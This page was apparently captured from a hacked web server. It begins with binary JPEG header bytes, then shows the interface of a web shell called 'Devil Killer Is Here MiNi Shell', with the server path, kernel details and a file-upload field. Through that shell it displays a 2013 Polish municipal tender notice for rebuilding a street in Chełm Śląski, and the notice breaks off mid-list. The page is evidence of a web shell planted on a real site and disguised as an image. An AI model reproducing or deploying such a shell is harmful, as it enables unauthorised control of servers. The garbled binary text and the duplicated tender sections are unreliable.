JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/162311-N-2013.html

<p class="kh_header"><b>Chełm Śląski: PRZEBUDOWA ULICY BŁĘDÓW W CHEŁMIE ŚLĄSKIM  

realizacja zadania inwestycyjnego składa się z dwóch etapów: 

Etap I: Przebudowa ul. Błędów w Chełmie Śląskim w km 0+000 do 1+451,91 w zakresie  remontu nawierzchni jezdni, rowów, przepustów, zjazdów i poboczy.

Etap II: Budowa chodnika dla pieszych w km 0 + 246,68 do km 1+ 451,91, przebudowa zjazdów indywidualnych oraz budowa kanalizacji deszczowej od km 0+250,17 do km 1+411,81 z odprowadzeniem wód opadowych do istniejącego kolektora w km 0+355,35 w ciągu ul. Błędów w Chełmie Śląskim.</b><br>
<b>Numer ogłoszenia: 162311 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chełm Śląski , ul. Konarskiego 2, 41-403 Chełm Śląski, woj. śląskie, tel. 032 2257503, faks 032 2257504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA ULICY BŁĘDÓW W CHEŁMIE ŚLĄSKIM  

realizacja zadania inwestycyjnego składa się z dwóch etapów: 

Etap I: Przebudowa ul. Błędów w Chełmie Śląskim w km 0+000 do 1+451,91 w zakresie  remontu nawierzchni jezdni, rowów, przepustów, zjazdów i poboczy.

Etap II: Budowa chodnika dla pieszych w km 0 + 246,68 do km 1+ 451,91, przebudowa zjazdów indywidualnych oraz budowa kanalizacji deszczowej od km 0+250,17 do km 1+411,81 z odprowadzeniem wód opadowych do istniejącego kolektora w km 0+355,35 w ciągu ul. Błędów w Chełmie Śląskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: PRZEBUDOWA ULICY BŁĘDÓW W CHEŁMIE ŚLĄSKIM                        realizacja zadania inwestycyjnego składającego się z dwóch etapów: 
a. Etap I: Przebudowa ul. Błędów w Chełmie Śląskim w km 0+000 do 1+451,91 w zakresie  remontu nawierzchni jezdni, rowów, przepustów, zjazdów i poboczy.
b. Etap II: Budowa chodnika dla pieszych w km 0 + 246,68 do km 1+ 451,91, przebudowa zjazdów indywidualnych oraz budowa kanalizacji deszczowej od km 0+250,17 do km 1+411,81 z odprowadzeniem wód opadowych do istniejącego kolektora w km 0+355,35 w ciągu ul. Błędów w Chełmie Śląskim.  
2. Przedmiotem zamówienia publicznego jest wykonanie  na podstawie dokumentacji projektowej robót budowlanych nie będących newralgicznymi, określonych w pkt. 1 oraz uzgodnienie i doprowadzenie do odbioru  tych robót przez  właściwe organy. 
3. Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa, przedmiar robót i specyfikacje techniczne wykonania i odbioru robót   budowlanych.. 
Wszelkie nazwy własne materiałów, wyrobów i urządzeń przywołane w ww. dokumentach służą ustaleniu pożądanego standardu wykonania i określenia właściwości i wymogów technicznych założonych w dokumentacji technicznej dla projektowanych rozwiązań. Wykonawca może zastosować te materiały lub równoważne zgodnie z wymaganiami specyfikacji technicznych wykonania i odbioru robót budowlanych.
4. W ramach przedmiotu zamówienia należy między innymi wykonać:
a. roboty pomiarowe, geodezyjne;
b. roboty  rozbiórkowe;
c. roboty ziemne;
d. podbudowa z kruszywa  łamanego;
e. podbudowa z mieszanek mineralno-bitumicznych asfaltowych;  
f. nawierzchnia z mieszanek mineralno-bitumicznych asfaltowych; 
g. przepusty rurowe pod zjazdami; 
h. krawężniki betonowe na ławie betonowej; 
i. remont rowów;
j. projekt oznakowania i oznakowanie pionowe i poziome na czas robót i docelowe;
k. nawierzchnia na zjazdach z kostki brukowej; 
l. harmonogram robót rzeczowy i finansowy;
m. przygotowanie dokumentów powykonawczych i gwarancyjnych;

-2-

5. Do obowiązków Wykonawcy ponadto należy :
a. pełna obsługa geodezyjna wraz z operatem powykonawczym ( na podkładzie map
zasadniczych ), z naniesioną lokalizacją urządzeń obcych objętych inwestycją;
b. wykonanie badań zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót w obecności Inspektora Nadzoru;
c. w przypadku zniszczenia w trakcie przedmiotowych robót znaków geodezyjnych, grawimetrycznych i magnetycznych odtworzenie i protokolarny odbiór przez Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Bieruniu;
d. w przypadku zbliżenia lub kolizji przedmiotowej inwestycji z innymi urządzeniami należy stosować się do uzgodnień branżowych zawartych w projekcie;
e. wykonanie projektu organizacji ruchu na czas budowy  i docelowy;
f. wykonanie robót pod stałym nadzorem inspektora nadzoru;
g. do każdego odbioru robót zanikających i ulegających zakryciu Wykonawca przygotuje dokumentację fotograficzną w wersji elektronicznej oraz gotowych fotografii i przedstawi Zamawiającemu zgodnie z terminami zawartymi w umowie;
h. Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać spełnienie wymagań określonych w art. 30 ust.5 ustawy Prawo zamówień publicznych.
6. Wykonawca, który będzie wykonywał zamówienie winien wykonać roboty budowlane na podstawie sporządzonej dokumentacji projektowej, przedmiarów robót, specyfikacji technicznych wykonania i odbioru robót, Polskimi Normami przenoszącymi europejskie normy zharmonizowane i sztuką budowlaną, przepisami p.poż i BHP. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się normy, aprobaty i wspólne specyfikacje wymienione w art.30 ust. 2 Ustawy Prawo zamówień publicznych i uzyskanych pozwoleń.
7. Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia. W przypadku rezygnacji Zamawiającego z realizacji części przedmiotu zamówienia, lub jej zmniejszenia - kwota należna Wykonawcy zostanie pomniejszona o wartość nie wykonywanej lub pomniejszonej części. Pomniejszenie nastąpi o wartości ustalone w oparciu o podstawy cenotwórcze kosztorysu ofertowego zgodnie z ofertą.
8. Uwarunkowania realizacyjne dla Wykonawcy: 
a. prace powinny być tak skoordynowane i prowadzone aby zapewnić brak utrudnień dla osób korzystających z terenów przyległych do placu budowy.
9. Cena za wykonanie przedmiotu zamówienia obejmuje całkowite koszty realizacji robót budowlanych zgodnie z dokumentacją projektową.
10. Oznaczenie wg Wspólnego Słownika Zamówień CPV:
a. 45111300-1 roboty rozbiórkowe; 
b. 45232410-9 - roboty budowlane w zakresie kanalizacji ściekowej; 
c. 45233320-8 - fundamentowanie dróg, ulic i ścieżek ruchu pieszego; 
d. 45233260-9 - roboty w zakresie dróg pieszych; 
e. 45233223-8 - roboty w zakresie nawierzchni dróg
11. Zamawiający nie dopuszcza składania ofert częściowych.
12. Zamawiający nie dopuszcza składania ofert wariantowych.. 
13. Zamawiający przewiduje udzielenie zamówień uzupełniających. Zakres zamówień uzupełniających nie przekroczy 50% wartości zamówienia podstawowego i obejmie ewentualne potrzeby zwiększenia zakresu przedmiotowego zamówienia podstawowego (w szczególności więcej przyłączy, przedłużenie sieci, itd.). Roboty uzupełniające będą tożsame z robotami objętymi zamówieniem podstawowym..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Przedmiot zamówienia: PRZEBUDOWA ULICY BŁĘDÓW W CHEŁMIE ŚLĄSKIM                        realizacja zadania inwestycyjnego składającego się z dwóch etapów: 
a. Etap I: Przebudowa ul. Błędów w Chełmie Śląskim w km 0+000 do 1+451,91 w zakresie  remontu nawierzchni jezdni, rowów, przepustów, zjazdów i poboczy.
b. Etap II: Budowa chodnika dla pieszych w km 0 + 246,68 do km 1+ 451,91, przebudowa zjazdów indywidualnych oraz budowa kanalizacji deszczowej od km 0+250,17 do km 1+411,81 z odprowadzeniem wód opadowych do istniejącego kolektora w km 0+355,35 w ciągu ul. Błędów w Chełmie Śląskim.  
2. Przedmiotem zamówienia publicznego jest wykonanie  na podstawie dokumentacji projektowej robót budowlanych nie będących newralgicznymi, określonych w pkt. 1 oraz uzgodnienie i doprowadzenie do odbioru  tych robót przez  właściwe organy. 
3. Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa, przedmiar robót i specyfikacje techniczne wykonania i odbioru robót   budowlanych.. 
Wszelkie nazwy własne materiałów, wyrobów i urządzeń przywołane w ww. dokumentach służą ustaleniu pożądanego standardu wykonania i określenia właściwości i wymogów technicznych założonych w dokumentacji technicznej dla projektowanych rozwiązań. Wykonawca może zastosować te materiały lub równoważne zgodnie z wymaganiami specyfikacji technicznych wykonania i odbioru robót budowlanych.
4. W ramach przedmiotu zamówienia należy między innymi wykonać:
a. roboty pomiarowe, geodezyjne;
b. roboty  rozbiórkowe;
c. roboty ziemne;
d. podbudowa z kruszywa  łamanego;
e. podbudowa z mieszanek mineralno-bitumicznych asfaltowych;  
f. nawierzchnia z mieszanek mineralno-bitumicznych asfaltowych; 
g. przepusty rurowe pod zjazdami; 
h. krawężniki betonowe na ławie betonowej; 
i. remont rowów;
j. projekt oznakowania i oznakowanie pionowe i poziome na czas robót i docelowe;
k. nawierzchnia na zjazdach z kostki brukowej; 
l. harmonogram robót rzeczowy i finansowy;
m. przygotowanie dokumentów powykonawczych i gwarancyjnych;

-2-

5. Do obowiązków Wykonawcy ponadto należy :
a. pełna obsługa geodezyjna wraz z operatem powykonawczym ( na podkładzie map
zasadniczych ), z naniesioną lokalizacją urządzeń obcych objętych inwestycją;
b. wykonanie badań zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót w obecności Inspektora Nadzoru;
c. w przypadku zniszczenia w trakcie przedmiotowych robót znaków geodezyjnych, grawimetrycznych i magnetycznych odtworzenie i protokolarny odbiór przez Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Bieruniu;
d. w przypadku zbliżenia lub kolizji przedmiotowej inwestycji z innymi urządzeniami należy stosować się do uzgodnień branżowych zawartych w projekcie;
e. wykonanie projektu organizacji ruchu na czas budowy  i docelowy;
f. wykonanie robót pod stałym nadzorem inspektora nadzoru;
g. do każdego odbioru robót zanikających i ulegających zakryciu Wykonawca przygotuje dokumentację fotograficzną w wersji elektronicznej oraz gotowych fotografii i przedstawi Zamawiającemu zgodnie z terminami zawartymi w umowie;
h. Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać spełnienie wymagań określonych w art. 30 ust.5 ustawy Prawo zamówień publicznych.
6. Wykonawca, który będzie wykonywał zamówienie winien wykonać roboty budowlane na podstawie sporządzonej dokumentacji projektowej, przedmiarów robót, specyfikacji technicznych wykonania i odbioru robót, Polskimi Normami przenoszącymi europejskie normy zharmonizowane i sztuką budowlaną, przepisami p.poż i BHP. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się normy, aprobaty i wspólne specyfikacje wymienione w art.30 ust. 2 Ustawy Prawo zamówień publicznych i uzyskanych pozwoleń.
7. Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia. W przypadku rezygnacji Zamawiającego z realizacji części przedmiotu zamówienia, lub jej zmniejszenia - kwota należna Wykonawcy zostanie pomniejszona o wartość nie wykonywanej lub pomniejszonej części. Pomniejszenie nastąpi o wartości ustalone w oparciu o podstawy cenotwórcze kosztorysu ofertowego zgodnie z ofertą.
8. Uwarunkowania realizacyjne dla Wykonawcy: 
a. prace powinny być tak skoordynowane i prowadzone aby zapewnić brak utrudnień dla osób korzystających z terenów przyległych do placu budowy.
9. Cena za wykonanie przedmiotu zamówienia obejmuje całkowite koszty realizacji robót budowlanych zgodnie z dokumentacją projektową.
10. Oznaczenie wg Wspólnego Słownika Zamówień CPV:
a. 45111300-1 roboty rozbiórkowe; 
b. 45232410-9 - roboty budowlane w zakresie kanalizacji ściekowej; 
c. 45233320-8 - fundamentowanie dróg, ulic i ścieżek ruchu pieszego; 
d. 45233260-9 - roboty w zakresie dróg pieszych; 
e. 45233223-8 - roboty w zakresie nawierzchni dróg
11. Zamawiający nie dopuszcza składania ofert częściowych.
12. Zamawiający nie dopuszcza składania ofert wariantowych.. 
13. Zamawiający przewiduje udzielenie zamówień uzupełniających. Zakres zamówień uzupełniających nie przekroczy 50% wartości zamówienia podstawowego i obejmie ewentualne potrzeby zwiększenia zakresu przedmiotowego zamówienia podstawowego (w szczególności więcej przyłączy, przedłużenie sieci, itd.). Roboty uzupełniające będą tożsame z robotami objętymi zamówieniem podstawowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8, 45.23.24.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) WADIUM
a) Wysokość wadium.
Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 40 000,00 PLN (słownie: czterdzieści tysięcy PLN)
b) Forma i termin wniesienia wadium.
Wadium może być wniesione w następujących formach:
i) pieniądzu: przelewem na konto : 29 1240 4227 1111 0000 4847 4168,
ii) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
iii) gwarancjach bankowych,
iv) gwarancjach ubezpieczeniowych;
v) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U 2007 r. Nr 42 poz. 275).
c) Wadium wnosi się przed upływem terminu składania ofert.
d) Za wniesienie wadium w formie pieniężnej Zamawiający uważa wadium, które w terminie do dnia w którym upływa termin składania ofert, do godz. 10:00 znajdzie się na rachunku Zamawiającego.
e) Do ofert należy dołączyć potwierdzenie wykonania przelewu.
f) W przypadku składania przez Wykonawcę wadium w formie gwarancji i/lub poręczenia, gwarancja i/lub poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między innymi następujące elementy:
i) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub poręczenia (Zamawiającego), gwaranta i/lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji i/lub poręczenia) oraz wskazanie ich siedzib,
ii) dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania, numer zamówienia nadany przez Zamawiającego oraz datę ogłoszenia przetargu,
-7-
iii) precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją i/lub poręczeniem,
iv) kwotę gwarancji i/lub poręczenia,
v) termin ważności gwarancji i/lub poręczenia,
vi) zobowiązanie gwaranta i/lub poręczyciela do: nieodwołalnego i bezwarunkowego zapłacenia kwoty gwarancji i/lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
(1) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 upzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 upzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po stronie Wykonawcy, lub
(2) odmówił podpisania umowy na warunkach określonych w ofercie, lub
(3) nie wniósł zabezpieczenia należytego wykonania umowy, lub
(4) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7) Wadium musi obejmować okres związania ofertą. Pierwszym dniem związania ofertą jest dzień składania ofert.
8) Oryginał wadium wnoszonego w innych dopuszczonych przez Zamawiającego formach niż w formie pieniężnej należy dołączyć do ofert. 
9) Zwrot wadium.
Zamawiający oświadcza, że zwrot wadium nastąpi niezwłocznie według zasad:
1. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
2. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano
3. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10) Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:
a) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 upzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 upzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po stronie Wykonawcy;
b) odmówił podpisania umowy na warunkach określonych w ofercie;
c) nie wniósł zabezpieczenia należytego wykonania umowy;
d) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1).posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: Zamawiający nie stawia w tym względzie żadnych wymagań;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) posiadania wiedzy i doświadczenia: w okresie ostatnich pięciu lat przed upływem terminu           składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują w zakresie przedmiotowej inwestycji co najmniej jedną robotę o wartości minimum 1.000.000,00 zł;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3).dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za wykonywania robót budowlanych, posiadających uprawnienia do wykonywania samodzielnych funkcji w budownictwie wydane na podstawie ustawy Prawo Budowlane lub im równoważne (wydane na podstawie wcześniejszych przepisów) tj.:
a. wykażą, że dysponują co najmniej jedną osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w branży drogowej, wpisaną do właściwej izby inżynierów budownictwa i posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej oraz posiadającą co najmniej 5 letnie doświadczenie zawodowe jako kierownik robót budowlanych;
b. wykażą, że dysponują osobą posiadającą uprawnienia budowlane w branży sanitarnej wpisaną do właściwej izby inżynierów budownictwa i posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej oraz posiadającą co najmniej 5 letnie doświadczenie zawodowe;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3).dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za wykonywania robót budowlanych, posiadających uprawnienia do wykonywania samodzielnych funkcji w budownictwie wydane na podstawie ustawy Prawo Budowlane lub im równoważne (wydane na podstawie wcześniejszych przepisów) tj.:
a. wykażą, że dysponują co najmniej jedną osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w branży drogowej, wpisaną do właściwej izby inżynierów budownictwa i posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej oraz posiadającą co najmniej 5 letnie doświadczenie zawodowe jako kierownik robót budowlanych;
b. wykażą, że dysponują osobą posiadającą uprawnienia budowlane w branży sanitarnej wpisaną do właściwej izby inżynierów budownictwa i posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej oraz posiadającą co najmniej 5 letnie doświadczenie zawodowe;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4).sytuacji ekonomicznej i finansowej: przedłoży polisę OC o wartości minimum 1.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

